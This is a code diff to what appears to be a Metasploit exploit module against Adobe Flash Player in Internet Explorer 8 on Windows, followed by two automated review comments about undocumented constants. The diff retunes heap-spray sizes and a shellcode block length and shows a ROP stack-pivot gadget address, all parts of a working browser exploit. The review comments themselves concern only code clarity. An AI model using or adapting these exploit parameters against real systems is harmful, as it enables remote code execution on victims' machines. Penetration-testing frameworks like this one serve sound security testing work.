diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
index 7222ebcb2d..b2a15b333f 100644
--- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@@ -109,8 +109,8 @@ class Metasploit3 < Msf::Exploit::Remote
 'Pivot' => 0x7c348b05, #XCHG EAX,ESP; RETN (MSVCR71.dll)
 'Offset1' => '0x5F4', #Offset for rop+payload
 'Offset2' => '0x02', #Offset to 0x11111110
- 'Max1' => '0x150', #First spray
- 'Max2' => '0x200' #Second spray
+ 'Max1' => '0x101', #First spray
+ 'Max2' => '0x300' #Second spray
 }
 ]
 ],
@@ -123,6 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
 OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])
 ], self.class
 )
+
 end

 def exploit
@@ -232,7 +233,7 @@ class Metasploit3 < Msf::Exploit::Remote
 #Extract string based on target
 if my_target.name == 'IE 8 on Windows 7'
- js_extract_str = "var block = shellcode.substring(0, (0x7ffc0-6)/2);"
+ js_extract_str = "var block = shellcode.substring(0, (0x7ff00-6)/2);"
 elsif my_target.name == 'IE 8 on Windows XP SP3'
 js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"
 else
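Review bot: The new `'Max1' => '0x101'` and `'Max2' => '0x300'` values arrive with no stated reason, and the trailing comments `#First spray` / `#Second spray` say neither what the number counts nor which tested configuration it was chosen for; the same applies to `0x7ff00` in the third hunk. A comment on each changed value, along the lines of `# retuned for <tested browser/OS build>, see <ticket placeholder>`, would let a later maintainer tell a deliberate value from a typo. These entries are also quoted strings while `'Pivot'` in the same hash is an integer literal; if that is because they are interpolated into generated script text, a one-line comment saying so would remove the inconsistency as a question. The target hash begins and ends outside this hunk.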
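Review bot: The length constant in `js_extract_str` is hard-coded under `if my_target.name == 'IE 8 on Windows 7'`, while the other per-target tuning values sit in the target hash edited in the first hunk, so this commit has to touch two places for one target. Selecting by display-name string also means a renamed target would silently fall through to the `else` branch. A comment above the branch such as `# keep in step with Max1/Max2 in the 'IE 8 on Windows 7' target entry` would document the coupling, though whether the values are actually interdependent is not visible from these lines. The `if`/`elsif`/`else` chain continues past the end of the hunk.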